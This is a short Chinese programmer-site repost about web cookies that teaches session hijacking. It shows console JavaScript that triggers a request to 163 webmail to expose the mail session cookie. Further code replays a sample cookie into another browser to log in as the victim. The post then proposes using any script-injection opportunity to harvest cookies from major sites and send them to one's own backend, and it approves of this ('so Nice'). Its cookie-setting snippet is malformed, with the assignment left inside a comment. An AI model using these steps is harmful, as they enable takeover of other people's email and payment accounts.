欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

WEB中的cookie

程序员文章站 2022-07-03 23:20:20
...

 首先来一篇好文章,刚好看到的:

沉默中的狂怒 —— Cookie 大喷发----------------       http://www.cnblogs.com/index-html/p/mitm-cookie-sniffer.html#3050493

  我就重复一遍啦:

  在chrome或者firefox下登陆下163的邮箱;

  在控制台执行js:

new Image().src = "http://push.webmail.mail.163.com";

  

  在控制台可以看到发送的的请求的RequestHeader的cookie;

  把这段cookie保存下来拉:

 

  打开另一个浏览器,执行这些代码;

var cookie = '_octo=GH1.1.1197126241.1409639170; logged_in=yes; dotcom_user=user; user_session=T0fclMsdfsdfv0eTN3-CsYUm2OQVnkMsdfUZLn8ZXJLwE7BTIwMEAInT9fptAn; tz=Asia%2FShanghai; _ga=GA1.2.68662887.1409639170; _gat=1; _gh_sess=eyJzZXNzaW9uX2lkIjoiYjI5ZGFlZGQwNGIwN2U5ZjAzZmUxZTIyYjY3MjA1NDYiLCJjb250ZXh0IjoiLyIsInJlZmVycmFsX2NvZGUiOiJodHRwczovL2dpdGh1Yi5jb20vIn0%3D--d4f09b50437a537b45adc451dc8319ac36aaf5fa'; //把你获取的cookie放到cookie这个变量去

cookie.split(";").forEach(function(e,i) {
  //设置cookie,过期时间为一天; document.cookie = e+";expired="+new Date(new Date().getTime() + 1000*60*60*24).toGMTString(); });

  我们现在再打开mail.163.com;发现登陆进去了;

  cookie是用来用户保存在本地的信息;每一个域名或者对应的子域名会保存这些消息,对保存有效期和大小都有限制,后台分配的对应cookie都是唯一的,所以只要cookie匹配,就知道是哪一个用户登陆的。

 

  所以只要用户了用户的cookie就相当于有了进入你邮箱或者支付宝或者等等等等的后门;soGood;

  也就是说只要在网页中有任何可以执行JS的机会都可以利用

    new Image().src = "http://push.webmail.mail.163.com;

    new Image().src = "http://www.baidu.com";

  遍历常见的比较大的网站,然后把劫持的cookie发送到后台, 我们就可以进行匿名登陆了. so Nice;

  算是复习一遍吧;